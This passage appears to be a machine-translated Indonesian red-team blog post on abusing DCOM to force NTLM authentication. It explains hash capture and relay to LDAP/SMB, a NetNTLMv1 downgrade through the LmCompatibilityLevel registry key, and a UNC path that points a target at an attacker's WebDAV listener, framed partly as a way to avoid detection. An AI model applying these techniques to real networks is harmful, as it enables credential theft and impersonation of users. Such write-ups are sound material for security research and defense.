Sekarang setelah kita tahu bahwa objek DCOM dapat diubah menjadi alat pembajakan sesi, langkah selanjutnya adalah mengidentifikasi Methods dan Properties mana yang dapat dimanfaatkan untuk menyelesaikan pembajakan. Untuk riset ini, saya menjelajahi apakah pembobolan pengguna dapat dicapai tanpa menjalankan payload—dengan menerapkan pendekatan yang berbeda dari kebanyakan teknik gerakan lateral DCOM publik.

Saya fokus untuk mencapai hasil yang sebanding dalam format “tanpa file”, yang berarti tidak perlu mentransfer atau menjalankan muatan pada sistem target. Perbedaan ini penting karena mentransfer dan menjalankan muatan pada sistem target sering dianggap sebagai tindakan “mahal” dalam operasi Red Team. Dengan menghindari langkah ini, risiko memicu kontrol keamanan umum berkurang secara signifikan. Oleh karena itu, saya bertujuan untuk mengkompromikan akun pengguna jarak jauh dengan memaksa autentikasi NTLM melalui DCOM.

Ada beberapa manfaat utama untuk memaksa otentikasi NTLM daripada melakukan teknik gerakan lateral tradisional:

Tangkap hash NTLMV1/NTLMv2 dan coba pecahkan secara offline

Relai hash NTLMv1 atau WebDAV NTLMv2 ke layanan jaringan lain, seperti LDAP atau SMB, untuk melakukan tindakan sebagai pengguna yang terpengaruh

Hindari mentransfer dan menjalankan muatan pada sistem target, yang biasanya menarik lebih banyak pengawasan dari alat keamanan

Hindari menyentuh proses LSASS, sehingga mengurangi risiko deteksi

Pada penulisan ini, penandatanganan LDAP dan pengikatan saluran tidak diperlukan dan diberlakukan secara default pada sebagian besar pengontrol domain. Fitur keamanan ini hanya wajib di Windows Server 2025. Ini berarti bahwa jika kita dapat memaksa otentikasi NTLMv1 atau WebDAV dari sistem target, kita dapat menyampaikannya ke LDAP dan melakukan tindakan sebagai pengguna yang terpengaruh. Demikian pula, penandatanganan SMB tidak diperlukan secara default pada server Windows, kecuali untuk pengontrol domain.

Pertimbangan penting lainnya adalah bahwa hash NTLMv1 dapat di-crack secara sepele menggunakan tabel pelangi, yang telah dibagikan secara publik oleh Nic Losby pada Desember 2024. Tabel ini secara drastis mengurangi waktu dan upaya yang diperlukan untuk memulihkan kredensial NTLM dari hash NTLMv1. Untuk mendapatkan hash NTLMv1 alih-alih hash NTLMv2, kami memodifikasi kunci registri berikut pada sistem target:

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

Menyetel LMCompatibilityLevel ke nilai 2 atau kurang memaksa sistem untuk kembali ke NTLMv1 untuk autentikasi. Modifikasi ini dimungkinkan dengan hak administrator lokal dan biasanya disebut sebagai “serangan downgrade NetNTLMv1”.

Atau, kita dapat menangkap otentikasi WebDAV dan meneruskannya ke LDAP, karena otentikasi berbasis HTTP dapat diteruskan ke layanan ini. Jika layanan WebClient belum berjalan dengan akses istimewa, kami dapat mengaktifkannya dari jarak jauh di sistem target. Setelah diaktifkan, kita dapat memaksa otentikasi NTLM WebDAV ke pendengar kita dengan menentukan nama NetBIOS mesin di jalur UNC. Sebagai contoh:

\\MYHACKERBOX@80\giveme\creds.txt

Untuk informasi lebih lanjut tentang serangan relai NTLM dan protokol yang dapat diteruskan ke titik akhir yang berbeda, lihat sumber daya berikut di sini.